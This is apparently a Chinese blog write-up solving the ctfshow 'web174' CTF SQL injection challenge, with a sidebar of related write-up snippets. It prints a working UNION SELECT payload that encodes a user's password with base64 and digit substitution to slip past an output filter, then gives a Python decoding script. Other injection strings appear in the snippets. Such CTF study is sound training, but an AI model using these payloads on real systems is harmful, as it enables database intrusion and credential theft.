CTFSHOW web入门——web174

最新推荐文章于 2024-09-29 18:24:58 发布
原创 最新推荐文章于 2024-09-29 18:24:58 发布 · 525 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #网络安全

文章展示了如何利用Base64编码结合SQL查询中的replace函数,对含有0-9的密码进行加密。通过将数字替换为特定字符,然后解密回原始值,成功地从ctfshow_user4表中查询到了名为flag的用户的加密密码,并提供了Python脚本来还原这个过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

查看函数,返回值把0-9的数字和flag给过滤了

 可以先用base64进行加密

0' union select 'a',replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(to_base64(password),"1","@A"),"2","@B"),"3","@C"),"4","@D"),"5","@E"),"6","@F"),"7","@G"),"8","@H"),"9","@I"),"0","@J") from ctfshow_user4 where username="flag" --+
 

replace()函数用法:
REPLACE ( string_expression , string_pattern , string_replacement )
参数:
string_expression:字符串表达式
string_pattern:想要查找的子字符串
string_replacement:想要替换成的子字符串

 得到了Y@CRmc@Bhvd@CtmZTAyOGNjMy@AiNDgzLTQ@ENWQtOTc@AOS@JxMDcyMmUzZjVjMDF@I

脚本替换回原来的flag

import base64

flag64 = "Y@CRmc@Bhvd@CsyNjZiN@BU@JYy@J@EZTJiLTQzOGEtODg@EZC@J@CYjc@AMTZhNTBkMzR@I"
flag = flag64.replace("@A", "1").replace("@B", "2").replace("@C", "3").replace("@D", "4").replace("@E", "5").replace("@F", "6").replace("@G", "7").replace("@H", "8").replace("@I", "9").replace("@J", "0")

print(base64.b64decode(flag))

获得flag

 

韦韦韦www
关注
CTFshow sql注入 上篇(web171-220)
Kradress的博客
03-18 7576
目录前言题目web 171(万能密码)web 172(回显内容过滤,base64或者hex编码绕过)web 173(回显内容过滤,base64或者hex编码绕过)web 174 (盲注)总结 前言 师傅们加油!!! 题目 web 171(万能密码) //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; id存在注
CTFshow web入门——文件上传
热门推荐
小元砸的博客
03-14 1万+
Web 151
ctfshow web入门174
m0_53095017的博客
05-24 764
过滤数字字符,使用脚本替换后再复原
CTFshow学习笔记---sql盲注:web-174
wecanning的博客
09-29 1753
sql盲注
ctfshow web171-174
akxnxbshai的博客
03-05 5191
Web 171 打开发现以下内容。 看到了一个查询语句,于是认真看了一下。 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; 直接传入1,代码会变成 select username,password from user where username !='flag' and id ='1' li
ctfshow SQL注入Web171-174
m0_62584974的博客
04-25 1628
2022/4/24 SQL注入Web171 语法:查询表中的数据 查询所有行 命令: select <字段1,字段2,...> from < 表名 > where < 条件> 例如:查看表 MyClass 中所有数据 mysql> select * from MyClass;查询语句 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='fl.
CTFshow web入门——爆破
小元砸的博客
01-24 5228
web 21 一.涉及工具: burp suit burp suit 使用教程 二.解题思路: 1.随便输一个密码和用户名抓包一下 2.base64解密一下发现账号密码的形式为 账号:密码,根据题目提示我们用自定义迭代器爆破,使用方法参考:Custom iterator的使用 注:下面爆破用的字典是题目所提供的 3.爆破出结果 web 22 一.涉及知识点: 子域名爆破(此题不能爆破出来)在线子域名爆破 二.解题思路: 直接点开View Hint(提示)即可得到答案 web 23 一.涉及工具: p
[ctfshow]web入门——命令执行(web72-web77)
ShenZ的博客
12-02 2758
ctfshow的命令执行(web72-77)
[ctfshow]web入门——命令执行(web40-web53)
ShenZ的博客
11-29 1561
文章目录web40 web40 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 06:03:36 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $
[ctfshow]web入门——文件上传(web156-web163)
ShenZ的博客
03-18 5939
[ctfshow]web入门——文件上传 web156 上传.user.ini web157 web158 web159 web160 上传.user.ini+日志包含 web161 web162 way1:远程文件包含 way2:session条件竞争包含 web163 上传口 试了试upload界面有一个默认文件,可以用上传.user.ini的方法 后台应该是屏蔽了很多字符串(php
ctfshow-web入门-sql
qq_43618536的博客
07-10 1102
ctfshow-web入门-sql
CTFshow——web174-180(sql注入)
m0_73756016的博客
12-19 1281
这是用正则匹配检查是否有flag先闭合order by爆列数爆数据库名 和 表名有三个表名 一个一个试一下虽然过滤了flag 但是没事 把他的password全显示出来就行。
ctfshow sql注入(174~184,187~188 ,比较简陋)
pwfortune的博客
03-17 1109
( ''%0a'' ''/**/'' ''%0b'' ''%09'' ''%0c'' ''()'' "%0d" “%00” ) ===>代替空格。第一种:1'union%0cselect%0c1,2,password%0cfrom%0cctfshow_user%0cwhere%0cusername='flag'%23。密码为ffifdyop,bp抓包得到flag。第一种:'or'1'='1'--%0c。
ctfshow sql入门174 175脚本
2202_75317918的博客
11-14 292
因为觉得脚本写的太烂了,二分法也迷迷糊糊的主要是python怎么学的那么烂!!再研究一下。
ctfshow-web入门-sql注入(web171-web175)
Welcome To Myon'Blog !
07-31 2421
这里只出了一个 id,因为换行导致我们误判为到了最后一个字符,因为我们的字典里只包括数字、小写字母和下划线,因此字符没找到,便跳出外层循环结束了代码。判断一下这次又是三个字段数了,因为还是对输出过滤了 flag,所有我们还是不查用户名,用占位符占位即可。接下来我们先判断下它数据库名的长度,这个其实可以通过 burpsuite 的攻击模块爆破的,没关系,我们这里手写一遍,也锻炼下我们 python 的能力。
每日10行代码174:ctfshow-crypto-easyrsa2 题目解答wp
天天卡丁的博客
07-21 357
就比如现实中,得到了一些信息,大家来解密,肯定也没有许多的提示信息,解密很重要的方法就是不断的尝试,去猜,所以ctf里的密码题目也是这样,没有那么多原因。知道把两个n去求下公约数,肯定是最早出这种类型题目的人想出来的,或者最早加密的人为了偷懒,更换模n时,没有重新去找p和q,而是沿用了以前的p或q。那么,再看看题目,给了两组n,e,c那有没有可能两个n有关系呢,可以试下他们有没有公约数,用libnum.gcd求了一下,发现两者还真有公约数,那就相当于对n做了因素分解。...
CTFSHOW web入门 sql注入 无过滤注入 web171-175
sinat_41572027的博客
07-07 1949
ctfshow web171-174
CTFshow刷题日记-WEB-SQL注入part1(171-184)
Love&Share
09-19 1253
SQL注入篇-共150道 mysql字符串函数 UPPER(s) 将字符串转换为大写 UCASE(s) 将字符串转换为大写 SUBSTRING(s, start, length) 从字符串 s 的 start 位置截取长度为 length 的子字符串 SUBSTRING_INDEX(s, delimiter, number) 返回从字符串 s 的第 number 个出现的分隔符 delimiter 之后的子串。 如果 number 是正数,返回第 number 个字符左边的字符串。
ctf_show笔记篇(web入门---sql注入)171-189
whale_waves的博客
03-12 1440
例如:原理,flag是十六进制的,最大到f所以可以用后面的英文来替换。利用into outfile来将查询到的表的内容写入到服务器的文件里。但这种情况一般需要知道web的地址例如/var/www/html/再利用python或者其他或者人工逆向替换回来。
ctfshow web入门 代码审计 web303
最新发布
01-04
对于CTFShow平台上Web入门级代码审计题目web303,虽然具体细节未直接提及于提供的参考资料中,但从其他相似题目的解析中可以获得一些通用的解题方法和技术。 #### 题目背景理解 通常这类题目涉及的是对给定PHP或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值